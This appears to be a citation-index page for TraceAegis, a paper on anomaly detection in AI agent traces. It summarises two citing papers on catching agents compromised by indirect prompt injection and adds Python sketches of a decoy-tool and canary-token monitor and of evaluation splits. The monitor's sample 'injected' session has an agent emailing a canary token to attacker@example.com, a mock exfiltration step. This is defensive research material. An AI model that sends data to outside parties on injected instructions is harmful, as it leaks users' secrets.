Liu et al., TraceAegis: Provenance-based anomaly detection for AI agent execution traces (2025)
Two papers indexed by Pith cite this work.
Citing papers by field: cs.CR (2). By year: 2026 (2). By verdict: unverdicted (2).
Citing papers:
- AgentShield: Deception-based Compromise Detection for Tool-using LLM Agents
  AgentShield places layered deception traps in the tool interfaces of LLM agents to detect compromises caused by indirect prompt injection. It reports 90.7-100% success on commercial models with zero false positives, and it transfers across languages without retraining.
- Content-Aware Attack Detection in LLM Agent Tool-Call Traffic: An Empirical Study of Features, Architectures, and Evaluation Protocols
  SBERT content embeddings yield an AUROC above 0.89 for detecting attacks in MCP tool-call sessions. Tree ensembles trained on pooled embeddings reach an AUROC of 0.975 and outperform GNNs when evaluated with task-stratified rather than random splits.
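The deception idea behind AgentShield (first entry above) can be illustrated with a generic honeytoken-style monitor. This sketch is not AgentShield's design, which this page does not describe. It assumes two hypothetical trap layers: decoy tools that no legitimate task needs, and canary strings planted in decoy data. A session is flagged if the agent invokes a decoy tool or passes a canary string into any tool call. The class, tool names, and canary value are all illustrative.

```python
from dataclasses import dataclass, field


@dataclass
class DecoyMonitor:
    """Hypothetical two-layer trap monitor for an agent's tool calls."""

    decoy_tools: set = field(default_factory=set)    # layer 1: tools no benign task needs
    canary_tokens: set = field(default_factory=set)  # layer 2: strings planted in decoy data

    def check_call(self, tool_name, arguments):
        """Return alert messages for a single tool call (empty list if clean)."""
        alerts = []
        if tool_name in self.decoy_tools:
            alerts.append(f"decoy tool invoked: {tool_name}")
        for value in arguments.values():
            if any(token in str(value) for token in self.canary_tokens):
                alerts.append(f"canary token passed to {tool_name}")
        return alerts

    def session_compromised(self, calls):
        """Flag the session if any (tool_name, arguments) call trips a trap."""
        return any(self.check_call(name, args) for name, args in calls)


# Illustrative configuration and sessions (all names are hypothetical).
monitor = DecoyMonitor(
    decoy_tools={"export_admin_credentials"},
    canary_tokens={"CANARY-7f3a"},
)
benign = [("search_docs", {"query": "quarterly report"})]
injected = [
    ("search_docs", {"query": "quarterly report"}),
    ("send_email", {"to": "attacker@example.com", "body": "token CANARY-7f3a"}),
]
print(monitor.session_compromised(benign), monitor.session_compromised(injected))
```

A benign agent working on the user's task has no reason to call a decoy tool or forward a canary string, so traps of this kind seldom fire on clean sessions. That is the general intuition behind deception-based detection. Whether it explains AgentShield's reported false-positive rate is not established here.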
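The second paper's point about evaluation protocols can be made concrete by contrasting a random split with a task-stratified one. This minimal sketch assumes that "task-stratified" means whole tasks are held out, so that no task contributes sessions to both the training and test data. The paper may define the protocol differently. The session dictionaries, the `task_id` field, and the function names are hypothetical and do not come from the paper.

```python
import random
from collections import defaultdict


def random_split(sessions, test_frac=0.3, seed=0):
    """Shuffle individual sessions; one task's sessions can land in both splits."""
    rng = random.Random(seed)
    shuffled = list(sessions)
    rng.shuffle(shuffled)
    n_test = round(len(shuffled) * test_frac)
    return shuffled[n_test:], shuffled[:n_test]


def task_stratified_split(sessions, test_frac=0.3, seed=0):
    """Assign whole tasks to train or test (assumed meaning of 'task-stratified')."""
    by_task = defaultdict(list)
    for session in sessions:
        by_task[session["task_id"]].append(session)
    tasks = sorted(by_task)
    random.Random(seed).shuffle(tasks)
    n_test_tasks = max(1, round(len(tasks) * test_frac))
    test_tasks = set(tasks[:n_test_tasks])
    train = [s for t in tasks if t not in test_tasks for s in by_task[t]]
    test = [s for t in tasks if t in test_tasks for s in by_task[t]]
    return train, test


def shared_tasks(train, test):
    """Task IDs that appear in both splits (leakage between train and test)."""
    return {s["task_id"] for s in train} & {s["task_id"] for s in test}


# Hypothetical data: 10 tasks, 6 tool-call sessions each, alternating labels.
sessions = [
    {"task_id": f"task-{t}", "label": i % 2} for t in range(10) for i in range(6)
]

rand_train, rand_test = random_split(sessions)
strat_train, strat_test = task_stratified_split(sessions)
print("random split shares tasks:", len(shared_tasks(rand_train, rand_test)))
print("task-stratified split shares tasks:", len(shared_tasks(strat_train, strat_test)))
```

Under a random split, sessions from the same task usually fall on both sides. A detector can then score well by recognizing familiar tasks rather than attacks. Holding out whole tasks removes that shortcut, which is one plausible reason the choice of protocol can change how architectures rank. The sketch does not reproduce the paper's results.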